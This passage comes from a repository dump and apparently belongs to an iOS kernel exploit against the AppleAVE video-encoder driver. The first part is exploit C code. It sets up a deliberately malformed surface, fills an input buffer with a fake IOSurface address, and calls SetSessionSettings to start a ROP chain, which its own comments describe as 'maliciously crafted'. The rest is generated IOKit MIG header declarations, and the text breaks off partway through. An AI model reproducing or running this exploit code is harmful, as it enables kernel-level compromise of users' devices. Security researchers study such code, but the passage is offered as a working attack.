surface %d", g_bad_surface_that_will_never_be_freed); 247 | } 248 | else { 249 | DEBUG_LOG("g_bad_surface_that_will_never_be_freed's kernel pointer is %p", g_bad_surface_that_will_never_be_freed_kernel_ptr); 250 | } 251 | 252 | cleanup: 253 | if (KERN_SUCCESS != ret) 254 | { 255 | if (g_surface_conn) 256 | { 257 | IOServiceClose(g_surface_conn); 258 | g_surface_conn = 0; 259 | } 260 | 261 | if (g_apple_ave_conn) 262 | { 263 | apple_ave_utils_remove_client(g_apple_ave_conn); 264 | IOServiceClose(g_apple_ave_conn); 265 | g_apple_ave_conn = 0; 266 | } 267 | } 268 | return ret; 269 | } 270 | 271 | /* 272 | * Function name: apple_ave_pwn_cleanup 273 | * Description: Cleans up the resources needed for the vulnerabilities. 274 | * Returns: kern_return_t. 275 | */ 276 | 277 | kern_return_t apple_ave_pwn_cleanup() { 278 | 279 | kern_return_t ret = KERN_SUCCESS; 280 | 281 | if (g_surface_conn) 282 | { 283 | if (g_bad_surface_that_will_never_be_freed) 284 | { 285 | iosurface_utils_release_surface(g_surface_conn, g_bad_surface_that_will_never_be_freed); 286 | g_bad_surface_that_will_never_be_freed = 0; 287 | } 288 | 289 | IOServiceClose(g_surface_conn); 290 | g_surface_conn = 0; 291 | } 292 | 293 | if (g_apple_ave_conn) 294 | { 295 | apple_ave_utils_remove_client(g_apple_ave_conn); 296 | IOServiceClose(g_apple_ave_conn); 297 | g_apple_ave_conn = 0; 298 | } 299 | 300 | return ret; 301 | } 302 | 303 | /* 304 | * Function name: apple_ave_pwn_initialize_input_buffer_for_fake_iosurface_usage 305 | * Description: Initializes the buffer so that the SetSessionSettings external method will 306 | use our maliciously crafted IOSurface object. 307 | * Returns: void. 308 | */ 309 | 310 | static 311 | void apple_ave_pwn_initialize_input_buffer_for_fake_iosurface_usage(void * input_buffer, void * fake_iosurface_address) { 312 | 313 | int i = 0; 314 | 315 | for(i = 4; i < 0x100; i += 4) { 316 | *(unsigned int*)((char*)input_buffer + i) = g_bad_surface_that_will_never_be_freed; 317 | } 318 | 319 | *(void**)((char*)input_buffer + 0x100) = fake_iosurface_address; 320 | *(void**)((char*)input_buffer + 0x108) = fake_iosurface_address; 321 | } 322 | 323 | 324 | 325 | /* 326 | * Function name: apple_ave_pwn_use_fake_iosurface 327 | * Description: Uses the fake IOSurface to start the ROP chain. 328 | * Returns: kern_return_t. 329 | */ 330 | 331 | kern_return_t apple_ave_pwn_use_fake_iosurface(void * fake_iosurface_address) { 332 | 333 | kern_return_t ret = KERN_SUCCESS; 334 | io_connect_t apple_ave_rop_conn = 0; 335 | char input_buffer[ENCODE_FRAME_INPUT_BUFFER_SIZE] = {0}; 336 | char output_buffer[ENCODE_FRAME_OUTPUT_BUFFER_SIZE] = {0}; 337 | 338 | *((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_chroma_format_idc)) = 1; 339 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_ui32_width)) = 0xC0; 340 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_ui32_height)) = 0xC0; 341 | *(unsigned int*)((char*)g_bad_surface_buffer + OFFSET(encode_frame_offset_slice_per_frame)) = 0x1; 342 | 343 | apple_ave_pwn_initialize_input_buffer_for_fake_iosurface_usage(input_buffer, fake_iosurface_address); 344 | 345 | ret = apple_ave_utils_get_connection(&apple_ave_rop_conn); 346 | if (KERN_SUCCESS != ret) 347 | { 348 | ERROR_LOG("Error establishing a connection to AppleAVE"); 349 | goto cleanup; 350 | } 351 | 352 | ret = apple_ave_utils_add_client(apple_ave_rop_conn); 353 | if (KERN_SUCCESS != ret) 354 | { 355 | ERROR_LOG("Error adding AppleAVE client"); 356 | IOServiceClose(apple_ave_rop_conn); 357 | apple_ave_rop_conn = 0; 358 | goto cleanup; 359 | } 360 | 361 | ret = apple_ave_utils_set_session_settings(apple_ave_rop_conn, input_buffer, output_buffer); 362 | if (KERN_SUCCESS != ret) 363 | { 364 | ERROR_LOG("Error setting session settings"); 365 | goto cleanup; 366 | } 367 | 368 | cleanup: 369 | 370 | if (apple_ave_rop_conn) 371 | { 372 | apple_ave_utils_remove_client(apple_ave_rop_conn); 373 | IOServiceClose(apple_ave_rop_conn); 374 | apple_ave_rop_conn = 0; 375 | } 376 | 377 | return ret; 378 | } 379 | 380 | 381 | 382 | -------------------------------------------------------------------------------- /iokit.h: -------------------------------------------------------------------------------- 1 | #ifndef _iokit_user_ 2 | #define _iokit_user_ 3 | 4 | /* Module iokit */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include "device_port.h" 18 | #include "device_types.h" 19 | 20 | /* BEGIN VOUCHER CODE */ 21 | 22 | #ifndef KERNEL 23 | #if defined(__has_include) 24 | #if __has_include() 25 | #ifndef USING_VOUCHERS 26 | #define USING_VOUCHERS 27 | #endif 28 | #ifndef __VOUCHER_FORWARD_TYPE_DECLS__ 29 | #define __VOUCHER_FORWARD_TYPE_DECLS__ 30 | #ifdef __cplusplus 31 | extern "C" { 32 | #endif 33 | extern boolean_t voucher_mach_msg_set(mach_msg_header_t *msg) __attribute__((weak_import)); 34 | #ifdef __cplusplus 35 | } 36 | #endif 37 | #endif // __VOUCHER_FORWARD_TYPE_DECLS__ 38 | #endif // __has_include() 39 | #endif // __has_include 40 | #endif // !KERNEL 41 | 42 | /* END VOUCHER CODE */ 43 | 44 | 45 | #ifdef AUTOTEST 46 | #ifndef FUNCTION_PTR_T 47 | #define FUNCTION_PTR_T 48 | typedef void (*function_ptr_t)(mach_port_t, char *, mach_msg_type_number_t); 49 | typedef struct { 50 | char *name; 51 | function_ptr_t function; 52 | } function_table_entry; 53 | typedef function_table_entry *function_table_t; 54 | #endif /* FUNCTION_PTR_T */ 55 | #endif /* AUTOTEST */ 56 | 57 | #ifndef iokit_MSG_COUNT 58 | #define iokit_MSG_COUNT 87 59 | #endif /* iokit_MSG_COUNT */ 60 | 61 | #include 62 | #include 63 | #include 64 | #include 65 | #include 66 | #include 67 | 68 | #ifdef __BeforeMigUserHeader 69 | __BeforeMigUserHeader 70 | #endif /* __BeforeMigUserHeader */ 71 | 72 | #include 73 | __BEGIN_DECLS 74 | 75 | 76 | /* Routine io_object_get_class */ 77 | #ifdef mig_external 78 | mig_external 79 | #else 80 | extern 81 | #endif /* mig_external */ 82 | kern_return_t io_object_get_class 83 | ( 84 | mach_port_t object, 85 | io_name_t className 86 | ); 87 | 88 | /* Routine io_object_conforms_to */ 89 | #ifdef mig_external 90 | mig_external 91 | #else 92 | extern 93 | #endif /* mig_external */ 94 | kern_return_t io_object_conforms_to 95 | ( 96 | mach_port_t object, 97 | io_name_t className, 98 | boolean_t *conforms 99 | ); 100 | 101 | /* Routine io_iterator_next */ 102 | #ifdef mig_external 103 | mig_external 104 | #else 105 | extern 106 | #endif /* mig_external */ 107 | kern_return_t io_iterator_next 108 | ( 109 | mach_port_t iterator, 110 | mach_port_t *object 111 | ); 112 | 113 | /* Routine io_iterator_reset */ 114 | #ifdef mig_external 115 | mig_external 116 | #else 117 | extern 118 | #endif /* mig_external */ 119 | kern_return_t io_iterator_reset 120 | ( 121 | mach_port_t iterator 122 | ); 123 | 124 | /* Routine io_service_get_matching_services */ 125 | #ifdef mig_external 126 | mig_external 127 | #else 128 | extern 129 | #endif /* mig_external */ 130 | kern_return_t io_service_get_matching_services 131 | ( 132 | mach_port_t master_port, 133 | io_string_t matching, 134 | mach_port_t *existing 135 | ); 136 | 137 | /* Routine io_registry_entry_get_property */ 138 | #ifdef mig_external 139 | mig_external 140 | #else 141 | extern 142 | #endif /* mig_external */ 143 | kern_return_t io_registry_entry_get_property 144 | ( 145 | mach_port_t registry_entry, 146 | io_name_t property_name, 147 | io_buf_ptr_t *properties, 148 | mach_msg_type_number_t *propertiesCnt 149 | ); 150 | 151 | /* Routine io_registry_create_iterator */ 152 | #ifdef mig_external 153 | mig_external 154 | #else 155 | extern 156 | #endif /* mig_external */ 157 | kern_return_t io_registry_create_iterator 158 | ( 159 | mach_port_t master_port, 160 | io_name_t plane, 161 | uint32_t options, 162 | mach_port_t *iterator 163 | ); 164 | 165 | /* Routine io_registry_iterator_enter_entry */ 166 | #ifdef mig_external 167 | mig_external 168 | #else 169 | extern 170 | #endif /* mig_external */ 171 | kern_return_t io_registry_iterator_enter_entry 172 | ( 173 | mach_port_t iterator 174 | ); 175 | 176 | /* Routine io_registry_iterator_exit_entry */ 177 | #ifdef mig_external 178 | mig_external 179 | #else 180 | extern 181 | #endif /* mig_external */ 182 | kern_return_t io_registry_iterator_exit_entry 183 | ( 184 | mach_port_t iterator 185 | ); 186 | 187 | /* Routine io_registry_entry_from_path */ 188 | #ifdef mig_external 189 | mig_external 190 | #else 191 | extern 192 | #endif /* mig_external */ 193 | kern_return_t io_registry_entry_from_path 194 | ( 195 | mach_port_t master_port, 196 | io_string_t path, 197 | mach_port_t *registry_entry 198 | ); 199 | 200 | /* Routine io_registry_entry_get_name */ 201 | #ifdef mig_external 202 | mig_external 203 | #else 204 | extern 205 | #endif /* mig_external */ 206 | kern_return_t io_registry_entry_get_name 207 | ( 208 | mach_port_t registry_entry, 209 | io_name_t name 210 | ); 211 | 212 | /* Routine io_registry_entry_get_properties */ 213 | #ifdef mig_external 214 | mig_external 215 | #else 216 | extern 217 | #endif /* mig_external */ 218 | kern_return_t io_registry_entry_get_properties 219 | ( 220 | mach_port_t registry_entry, 221 | io_buf_ptr_t *properties, 222 | mach_msg_type_number_t *propertiesCnt 223 | ); 224 | 225 | /* Routine io_registry_entry_get_property_bytes */ 226 | #ifdef mig_external 227 | mig_external 228 | #else 229 | extern 230 | #endif /* mig_external */ 231 | kern_return_t io_registry_entry_get_property_bytes 232 | ( 233 | mach_port_t registry_entry, 234 | io_name_t property_name, 235 | io_struct_inband_t data, 236 | mach_msg_type_number_t *dataCnt 237 | ); 238 | 239 | /* Routine io_registry_entry_get_child_iterator */ 240 | #ifdef mig_external 241 | mig_external 242 | #else 243 | extern 244 | #endif /* mig_external */ 245 | kern_return_t io_registry_entry_get_child_iterator 246 | ( 247 | mach_port_t registry_entry, 248 | io_name_t plane, 249 | mach_port_t *iterator 250 | ); 251 | 252 | /* Routine io_registry_entry_get_parent_iterator */ 253 | #ifdef mig_external 254 | mig_external 255 | #else 256 | extern 257 | #endif /* mig_external */ 258 | kern_return_t io_registry_entry_get_parent_iterator 259 | ( 260 | mach_port_t registry_entry, 261 | io_name_t plane, 262 | mach_port_t *iterator 263 | ); 264 | 265 | /* Routine io_service_close */ 266 | #ifdef mig_external 267 | mig_external 268 | #else 269 | extern 270 | #endif /* mig_external */ 271 | kern_return_t io_service_close 272 | ( 273 | mach_port_t connection 274 | ); 275 | 276 | /* Routine io_connect_get_service */ 277 | #ifdef mig_external 278 | mig_external 279 | #else 280 | extern 281 | #endif /* mig_external */ 282 | kern_return_t io_connect_get_service 283 | ( 284 | mach_port_t connection, 285 | mach_port_t *service 286 | ); 287 | 288 | /* Routine io_connect_set_notification_port */ 289 | #ifdef mig_external 290 | mig_external 291 | #else 292 | extern 293 | #endif /* mig_external */ 294 | kern_return_t io_connect_set_notification_port 295 | ( 296 | mach_port_t connection, 297 | uint32_t notification_type, 298 | mach_port_t port, 299 | uint32_t reference 300 | ); 301 | 302 | /* Routine io_connect_map_memory */ 303 | #ifdef mig_external 304 | mig_external 305 | #else 306 | extern 307 | #endif /* mig_external */ 308 | kern_return_t io_connect_map_memory 309 | ( 310 | mach_port_t connection, 311 | uint32_t memory_type, 312 | task_t into_task, 313 | vm_address_t *address, 314 | vm_size_t *size, 315 | uint32_t flags 316 | ); 317 | 318 | /* Routine io_connect_add_client */ 319 | #ifdef mig_external 320 | mig_external 321 | #else 322 | extern 323 | #endif /* mig_external */ 324 | kern_return_t io_connect_add_client 325 | ( 326 | mach_port_t connection, 327 | mach_port_t connect_to 328 | ); 329 | 330 | /* Routine io_connect_set_properties */ 331 | #ifdef mig_external 332 | mig_external 333 | #else 334 | extern 335 | #endif /* mig_external */ 336 | kern_return_t io_connect_set_properties 337 | ( 338 | mach_port_t connection, 339 | io_buf_ptr_t properties, 340 | mach_msg_type_number_t propertiesCnt, 341 | kern_return_t *result 342 | ); 343 | 344 | /* Routine io_connect_method_scalarI_scalarO */ 345 | #ifdef mig_external 346 | mig_external 347 | #else 348 | extern 349 | #endif /* mig_external */ 350 | kern_return_t io_connect_method_scalarI_scalarO 351 | ( 352 | mach_port_t connection, 353 | uint32_t selector, 354 | io_scalar_inband_t input, 355 | mach_msg_type_number_t inputCnt, 356 | io_scalar_inband_t output, 357 | mach_msg_type_number_t *outputCnt 358 | ); 359 | 360 | /* Routine io_connect_method_scalarI_structureO */ 361 | #ifdef mig_external 362 | mig_external 363 | #else 364 | extern 365 | #endif /* mig_external */ 366 | kern_return_t io_connect_method_scalarI_structureO 367 | ( 368 | mach_port_t connection, 369 | uint32_t selector, 370 | io_scalar_inband_t input, 371 | mach_msg_type_number_t inputCnt, 372 | io_struct_inband_t output, 373 | mach_msg_type_number_t *outputCnt 374 | ); 375 | 376 | /* Routine io_connect_method_scalarI_structureI */ 377 | #ifdef mig_external 378 | mig_external 379 | #else 380 | extern 381 | #endif /* mig_external */ 382 | kern_return_t io_connect_method_scalarI_structureI 383 | ( 384 | mach_port_t connection, 385 | uint32_t selector, 386 | io_scalar_inband_t input, 387 | mach_msg_type_number_t inputCnt, 388 | io_struct_inband_t inputStruct, 389 | mach_msg_type_number_t inputStructCnt 390 | ); 391 | 392 | /* Routine io_connect_method_structureI_structureO */ 393 | #ifdef mig_external 394 | mig_external 395 | #else 396 | extern 397 | #endif /* mig_external */ 398 | kern_return_t io_connect_method_structureI_structureO 399 | ( 400 | mach_port_t connection, 401 | uint32_t selector, 402 | io_struct_inband_t input, 403 | mach_msg_type_number_t inputCnt, 404 | io_struct_inband_t output, 405 | mach_msg_type_number_t *outputCnt 406 | ); 407 | 408 | /* Routine io_registry_entry_get_path */ 409 | #ifdef mig_external 410 | mig_external 411 | #else 412 | extern 413 | #endif /* mig_external */ 414 | kern_return_t io_registry_entry_get_path 415 | ( 416 | mach_port_t registry_entry, 417 | io_name_t plane, 418 | io_string_t path 419 | ); 420 | 421 | /* Routine io_registry_get_root_entry */ 422 | #ifdef mig_external 423 | mig_external 424 | #else 425 | extern 426 | #endif /* mig_external */ 427 | kern_return_t io_registry_get_root_entry 428 | ( 429 | mach_port_t master_port, 430 | mach_port_t *root 431 | ); 432 | 433 | /* Routine io_registry_entry_set_properties */ 434 | #ifdef mig_external 435 | mig_external 436 | #else 437 | extern 438 | #endif /* mig_external */ 439 | kern_return_t io_registry_entry_set_properties 440 | ( 441 | mach_port_t registry_entry, 442 | io_buf_ptr_t properties, 443 | mach_msg_type_number_t propertiesCnt, 444 | kern_return_t *result 445 | ); 446 | 447 | /* Routine io_registry_entry_in_plane */ 448 | #ifdef mig_external 449 | mig_external 450 | #else 451 | extern 452 | #endif /* mig_external */ 453 | kern_return_t io_registry_entry_in_plane 454 | ( 455 | mach_port_t registry_entry, 456 | io_name_t plane, 457 | boolean_t *inPlane 458 | ); 459 | 460 | /* Routine io_object_get_retain_count */ 461 | #ifdef mig_external 462 | mig_external 463 | #else 464 | extern 465 | #endif /* mig_external */ 466 | kern_return_t io_object_get_retain_count 467 | ( 468 | mach_port_t object, 469 | uint32_t *retainCount 470 | ); 471 | 472 | /* Routine io_service_get_busy_state */ 473 | #ifdef mig_external 474 | mig_external 475 | #else 476 | extern 477 | #endif /* mig_external */ 478 | kern_return_t io_service_get_busy_state 479 | ( 480 | mach_port_t service, 481 | uint32_t *busyState 482 | ); 483 | 484 | /* Routine io_service_wait_quiet */ 485 | #ifdef mig_external 486 | mig_external 487 | #else 488 | extern 489 | #endif /* mig_external */ 490 | kern_return_t io_service_wait_quiet 491 | ( 492 | mach_port_t service, 493 | mach_timespec_t wait_time 494 | ); 495 | 496 | /* Routine io_registry_entry_create_iterator */ 497 | #ifdef mig_external 498 | mig_external 499 | #else 500 | extern 501 | #endif /* mig_external */ 502 | kern_return_t io_registry_entry_create_iterator 503 | ( 504 | mach_port_t registry_entry, 505 | io_name_t plane, 506 | uint32_t options, 507 | mach_port_t *iterator 508 | ); 509 | 510 | /* Routine io_iterator_is_valid */ 511 | #ifdef mig_external 512 | mig_external 513 | #else 514 | extern 515 | #endif /* mig_external */ 516 | kern_return_t io_iterator_is_valid 517 | ( 518 | mach_port_t iterator, 519 | boolean_t *is_valid 520 | ); 521 | 522 | /* Routine io_catalog_send_data */ 523 | #ifdef mig_external 524 | mig_external 525 | #else 526 | extern 527 | #endif /* mig_external */ 528 | kern_return_t io_catalog_send_data 529 | ( 530 | mach_port_t master_port, 531 | uint32_t flag, 532 | io_buf_ptr_t inData, 533 | mach_msg_type_number_t inDataCnt, 534 | kern_return_t *result 535 | ); 536 | 537 | /* Routine io_catalog_terminate */ 538 | #ifdef mig_external 539 | mig_external 540 | #else 541 | extern 542 | #endif /* mig_external */ 543 | kern_return_t io_catalog_terminate 544 | ( 545 | mach_port_t master_port, 546 | uint32_t flag, 547 | io_name_t name 548 | ); 549 | 550 | /* Routine io_catalog_get_data */ 551 | #ifdef mig_external 552 | mig_external 553 | #else 554 | extern 555 | #endif /* mig_external */ 556 | kern_return_t io_catalog_get_data 557 | ( 558 | mach_port_t master_port, 559 | uint32_t flag, 560 | io_buf_ptr_t *outData, 561 | mach_msg_type_number_t *outDataCnt 562 | ); 563 | 564 | /* Routine io_catalog_get_gen_count */ 565 | #ifdef mig_external 566 | mig_external 567 | #else 568 | extern 569 | #endif /* mig_external */ 570 | kern_return_t io_catalog_get_gen_count 571 | ( 572 | mach_port_t master_port, 573 | uint32_t *genCount 574 | ); 575 | 576 | /* Routine io_catalog_module_loaded */ 577 | #ifdef mig_external 578 | mig_external 579 | #else 580 | extern 581 | #endif /* mig_external */ 582 | kern_return_t io_catalog_module_loaded 583 | ( 584 | mach_port_t master_port, 585 | io_name_t name 586 | ); 587 | 588 | /* Routine io_catalog_reset */ 589 | #ifdef mig_external 590 | mig_external 591 | #else 592 | extern 593 | #endif /* mig_external */ 594 | kern_return_t io_catalog_reset 595 | ( 596 | mach_port_t master_port, 597 | uint32_t flag 598 | ); 599 | 600 | /* Routine io_service_request_probe */ 601 | #ifdef mig_external 602 | mig_external 603 | #else 604 | extern 605 | #endif /* mig_external */ 606 | kern_return_t io_service_request_probe 607 | ( 608 | mach_port_t service, 609 | uint32_t options 610 | ); 611 | 612 | /* Routine io_registry_entry_get_name_in_plane */ 613 | #ifdef mig_external 614 | mig_external 615 | #else 616 | extern 617 | #endif /* mig_external */ 618 | kern_return_t io_registry_entry_get_name_in_plane 619 | ( 620 | mach_port_t registry_entry, 621 | io_name_t plane, 622 | io_name_t name 623 | ); 624 | 625 | /* Routine io_service_match_property_table */ 626 | #ifdef mig_external 627 | mig_external 628 | #else 629 | extern 630 | #endif /* mig_external */ 631 | kern_return_t io_service_match_property_table 632 | ( 633 | mach_port_t service, 634 | io_string_t matching, 635 | boolean_t *matches 636 | ); 637 | 638 | /* Routine io_async_method_scalarI_scalarO */ 639 | #ifdef mig_external 640 | mig_external 641 | #else 642 | extern 643 | #endif /* mig_external */ 644 | kern_return_t io_async_method_scalarI_scalarO 645 | ( 646 | mach_port_t connection, 647 | mach_port_t wake_port, 648 | io_async_ref_t reference, 649 | mach_msg_type_number_t referenceCnt, 650 | uint32_t selector, 651 | io_scalar_inband_t input, 652 | mach_msg_type_number_t inputCnt, 653 | io_scalar_inband_t output, 654 | mach_msg_type_number_t *outputCnt 655 | ); 656 | 657 | /* Routine io_async_method_scalarI_structureO */ 658 | #ifdef mig_external 659 | mig_external 660 | #else 661 | extern 662 | #endif /* mig_external */ 663 | kern_return_t io_async_method_scalarI_structureO 664 | ( 665 | mach_port_t connection, 666 | mach_port_t wake_port, 667 | io_async_ref_t reference, 668 | mach_msg_type_number_t referenceCnt, 669 | uint32_t selector, 670 | io_scalar_inband_t input, 671 | mach_msg_type_number_t inputCnt, 672 | io_struct_inband_t output, 673 | mach_msg_type_number_t *outputCnt 674 | ); 675 | 676 | /* Routine io_async_method_scalarI_structureI */ 677 | #ifdef mig_external 678 | mig_external 679 | #else 680 | extern 681 | #endif /* mig_external */ 682 | kern_return_t io_async_method_scalarI_structureI 683 | ( 684 | mach_port_t connection, 685 | mach_port_t wake_port, 686 | io_async_ref_t reference, 687 | mach_msg_type_number_t referenceCnt, 688 | uint32_t selector, 689 | io_scalar_inband_t input, 690 | mach_msg_type_number_t inputCnt, 691 | io_struct_inband_t inputStruct, 692 | mach_msg_type_number_t inputStructCnt 693 | ); 694 | 695 | /* Routine io_async_method_structureI_structureO */ 696 | #ifdef mig_external 697 | mig_external 698 | #else 699 | extern 700 | #endif /* mig_external */ 701 | kern_return_t io_async_method_structureI_structureO 702 | ( 703 | mach_port_t connection, 704 | mach_port_t wake_port, 705 | io_async_ref_t reference, 706 | mach_msg_type_number_t referenceCnt, 707 | uint32_t selector, 708 | io_struct_inband_t input, 709 | mach_msg_type_number_t inputCnt, 710 | io_struct_inband_t output, 711 | mach_msg_type_number_t *outputCnt 712 | ); 713 | 714 | /* Routine io_service_add_notification */ 715 | #ifdef mig_external 716 | mig_external 717 | #else 718 | extern 719 | #endif /* mig_external */ 720 | kern_return_t io_service_add_notification 721 | ( 722 | mach_port_t master_port, 723 | io_name_t notification_type, 724 | io_string_t matching, 725 | mach_port_t wake_port, 726 | io_async_ref_t reference, 727 | mach_msg_type_number_t referenceCnt, 728 | mach_port_t *notification 729 | ); 730 | 731 | /* Routine io_service_add_interest_notification */ 732 | #ifdef mig_external 733 | mig_external 734 | #else 735 | extern 736 | #endif /* mig_external */ 737 | kern_return_t io_service_add_interest_notification 738 | ( 739 | mach_port_t service, 740 | io_name_t type_of_interest, 741 | mach_port_t wake_port, 742 | io_async_ref_t reference, 743 | mach_msg_type_number_t referenceCnt, 744 | mach_port_t *notification 745 | ); 746 | 747 | /* Routine io_service_acknowledge_notification */ 748 | #ifdef mig_external 749 | mig_external 750 | #else 751 | extern 752 | #endif /* mig_external */ 753 | kern_return_t io_service_acknowledge_notification 754 | ( 755 | mach_port_t service, 756 | natural_t notify_ref, 757 | natural_t response 758 | ); 759 | 760 | /* Routine io_connect_get_notification_semaphore */ 761 | #ifdef mig_external 762 | mig_external 763 | #else 764 | extern 765 | #endif /* mig_external */ 766 | kern_return_t io_connect_get_notification_semaphore 767 | ( 768 | mach_port_t connection, 769 | natural_t notification_type, 770 | semaphore_t *semaphore 771 | ); 772 | 773 | /* Routine io_connect_unmap_memory */ 774 | #ifdef mig_external 775 | mig_external 776 | #else 777 | extern 778 | #endif /* mig_external */ 779 | kern_return_t io_connect_unmap_memory 780 | ( 781 | mach_port_t connection, 782 | uint32_t memory_type, 783 | task_t into_task, 784 | vm_address_t address 785 | ); 786 | 787 | /* Routine io_registry_entry_get_location_in_plane */ 788 | #ifdef mig_external 789 | mig_external 790 | #else 791 | extern 792 | #endif /* mig_external */ 793 | kern_return_t io_registry_entry_get_location_in_plane 794 | ( 795 | mach_port_t registry_entry, 796 | io_name_t plane, 797 | io_name_t location 798 | ); 799 | 800 | /* Routine io_registry_entry_get_property_recursively */ 801 | #ifdef mig_external 802 | mig_external 803 | #else 804 | extern 805 | #endif /* mig_external */ 806 | kern_return_t io_registry_entry_get_property_recursively 807 | ( 808 | mach_port_t registry_entry, 809 | io_name_t plane, 810 | io_name_t property_name, 811 | uint32_t options, 812 | io_buf_ptr_t *properties, 813 | mach_msg_type_number_t *propertiesCnt 814 | ); 815 | 816 | /* Routine io_service_get_state */ 817 | #ifdef mig_external 818 | mig_external 819 | #else 820 | extern 821 | #endif /* mig_external */ 822 | kern_return_t io_service_get_state 823 | ( 824 | mach_port_t service, 825 | uint64_t *state, 826 | uint32_t *busy_state, 827 | uint64_t *accumulated_busy_time 828 | ); 829 | 830 | /* Routine io_service_get_matching_services_ool */ 831 | #ifdef mig_external 832 | mig_external 833 | #else 834 | extern 835 | #endif /* mig_external */ 836 | kern_return_t io_service_get_matching_services_ool 837 | ( 838 | mach_port_t master_port, 839 | io_buf_ptr_t matching, 840 | mach_msg_type_number_t matchingCnt, 841 | kern_return_t *result, 842 | mach_port_t *existing 843 | ); 844 | 845 | /* Routine io_service_match_property_table_ool */ 846 | #ifdef mig_external 847 | mig_external 848 | #else 849 | extern 850 | #endif /* mig_external */ 851 | kern_return_t io_service_match_property_table_ool 852 | ( 853 | mach_port_t service, 854 | io_buf_ptr_t matching, 855 | mach_msg_type_number_t matchingCnt, 856 | kern_return_t *result, 857 | boolean_t *matches 858 | ); 859 | 860 | /* Routine io_service_add_notification_ool */ 861 | #ifdef mig_external 862 | mig_external 863 | #else 864 | extern 865 | #endif /* mig_external */ 866 | kern_return_t io_service_add_notification_ool 867 | ( 868 | mach_port_t master_port, 869 | io_name_t notification_type, 870 | io_buf_ptr_t matching, 871 | mach_msg_type_number_t matchingCnt, 872 | mach_port_t wake_port, 873 | io_async_ref_t reference, 874 | mach_msg_type_number_t referenceCnt, 875 | kern_return_t *result, 876 | mach_port_t *notification 877 | ); 878 | 879 | /* Routine io_object_get_superclass */ 880 | #ifdef mig_external 881 | mig_external 882 | #else 883 | extern 884 | #endif /* mig_external */ 885 | kern_return_t io_object_get_superclass 886 | ( 887 | mach_port_t master_port, 888 | io_name_t obj_name, 889 | io_name_t class_name 890 | ); 891 | 892 | /* Routine io_object_get_bundle_identifier */ 893 | #ifdef mig_external 894 | mig_external 895 | #else 896 | extern 897 | #endif /* mig_external */ 898 | kern_return_t io_object_get_bundle_identifier 899 | ( 900 | mach_port_t master_port, 901 | io_name_t obj_name, 902 | io_name_t class_name 903 | ); 904 | 905 | /* Routine io_service_open_extended */ 906 | #ifdef mig_external 907 | mig_external 908 | #else 909 | extern 910 | #endif /* mig_external */ 911 | kern_return_t io_service_open_extended 912 | ( 913 | mach_port_t service, 914 | task_t owningTask, 915 | uint32_t connect_type, 916 | NDR_record_t ndr, 917 | io_buf_ptr_t properties, 918 | mach_msg_type_number_t propertiesCnt, 919 | kern_return_t *result, 920 | mach_port_t *connection 921 | ); 922 | 923 | /* Routine io_connect_map_memory_into_task */ 924 | #ifdef mig_external 925 | mig_external 926 | #else 927 | extern 928 | #endif /* mig_external */ 929 | kern_return_t io_connect_map_memory_into_task 930 | ( 931 | mach_port_t connection, 932 | uint32_t memory_type, 933 | task_t into_task, 934 | mach_vm_address_t *address, 935 | mach_vm_size_t *size, 936 | uint32_t flags 937 | ); 938 | 939 | /* Routine io_connect_unmap_memory_from_task */ 940 | #ifdef mig_external 941 | mig_external 942 | #else 943 | extern 944 | #endif /* mig_external */ 945 | kern_return_t io_connect_unmap_memory_from_task 946 | ( 947 | mach_port_t connection, 948 | uint32_t memory_type, 949 | task_t from_task, 950 | mach_vm_address_t address 951 | ); 952 | 953 | /* Routine io_connect_method */ 954 | #ifdef mig_external 955 | mig_external 956 | #else 957 | extern 958 | #endif /* mig_external */ 959 | kern_return_t io_connect_method 960 | ( 961 | mach_port_t connection, 962 | uint32_t selector, 963 | io_scalar_inband64_t scalar_input, 964 | mach_msg_type_number_t scalar_inputCnt, 965 | io_struct_inband_t inband_input, 966 | mach_msg_type_number_t inband_inputCnt, 967 | mach_vm_address_t ool_input, 968 | mach_vm_size_t ool_input_size, 969 | io_struct_inband_t inband_output, 970 | mach_msg_type_number_t *inband_outputCnt, 971 | io_scalar_inband64_t scalar_output, 972 | mach_msg_type_number_t *scalar_outputCnt, 973 | mach_vm_address_t ool_output, 974 | mach_vm_size_t *ool_output_size 975 | ); 976 | 977 | /* Routine io_connect_async_method */ 978 | #ifdef mig_external 979 | mig_external 980 | #else 981 | extern 982 | #endif /* mig_external */ 983 | kern_return_t io_connect_async_method 984 | ( 985 | mach_port_t connection, 986 | mach_port_t wake_port, 987 | io_async_ref64_t reference, 988 | mach_msg_type_number_t referenceCnt, 989 | uint32_t selector, 990 | io_scalar_inband64_t scalar_input, 991 | mach_msg_type_number_t scalar_inputCnt, 992 | io_struct_inband_t inband_input, 993 | mach_msg_type_number_t inband_inputCnt, 994 | mach_vm_address_t ool_input, 995 | mach_vm_size_t ool_input_size, 996 | io_struct_inband_t inband_output, 997 | mach_msg_type_number_t *inband_outputCnt, 998 | io_scalar_inband64_t scalar_output, 999 | mach_msg_type_number_t *scalar_outputCnt, 1000 | mach_vm_address_t ool_output, 1001 | mach_vm_size_t *ool_output_size 1002 | ); 1003 | 1004 | /* Routine io_registry_entry_get_registry_entry_id */ 1005 | #ifdef mig_external 1006 | mig_external 1007 | #else 1008 | extern 1009 | #endif /* mig_external */ 1010 | kern_return_t io_registry_entry_get_registry_entry_id 1011 | ( 1012 | mach_port_t registry_entry, 1013 | uint64_t *entry_id 1014 | ); 1015 | 1016 | /* Routine io_connect_method_var_output */ 1017 | #ifdef mig_external 1018 | mig_external 1019 | #else 1020 | extern 1021 | #endif /* mig_external */ 1022 | kern_return_t io_connect_method_var_output 1023 | ( 1024 | mach_port_t connection, 1025 | uint32_t selector, 1026 | io_scalar_inband64_t scalar_input, 1027 | mach_msg_type_number_t scalar_inputCnt, 1028 | io_struct_inband_t inband_input, 1029 | mach_msg_type_number_t inband_inputCnt, 1030 | mach_vm_address_t ool_input, 1031 | mach_vm_size_t ool_input_size, 1032 | io_struct_inband_t inband_output, 1033 | mach_msg_type_number_t *inband_outputCnt, 1034 | io_scalar_inband64_t scalar_output, 1035 | mach_msg_type_number_t *scalar_outputCnt, 1036 | io_buf_ptr_t *var_output, 1037 | mach_msg_type_number_t *var_outputCnt 1038 | ); 1039 | 1040 | /* Routine 